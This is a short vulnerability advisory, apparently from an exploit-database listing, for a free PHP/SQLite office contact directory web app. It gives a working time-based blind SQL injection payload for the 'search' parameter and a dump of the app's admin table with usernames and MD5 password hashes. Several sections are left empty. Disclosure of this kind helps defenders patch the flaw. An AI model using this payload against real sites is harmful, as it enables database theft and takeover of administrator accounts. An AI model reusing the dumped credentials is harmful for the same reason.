Local Offices Contact Directory Site SQL Injection

Local Offices Contact Directory Site using PHP and SQLite Free Source Code suffers from a remote SQL injection vulnerability.

MD5 | b6786101aa6c4cb696251f2b75da6e63


## Vendor:

## Description:
The `search` parameter appears to be vulnerable to time-based blind
SQL injection attacks, on the web app "Local Offices Contact
Directories Site" (by oretnom23).
The malicious attacker can execute a malicious payload and he can dump
hashes authentication credentials. Then the attacker can to
take control of the admin account of the system and can steal
sensitive information and can destroy the system administrative

## Payload:
Parameter: search (GET)
Type: time-based blind
Title: SQLite > 2.0 AND time-based blind (heavy query)
Payload: search=481614'||(SELECT CHAR(79,85,82,97) WHERE 8245=8245
AND 4378=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||'
- dump

Table: admin_list
[2 entries]
| username | password |
| admin | 0192023a7bbd73250516f069df18b500 |
| cblake | cd74fae0a3adf459f73bbf187607ccea |

## Reproduce:

## Proof:

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
nu11secur1ty <http://nu11secur1ty.com/>

Related Posts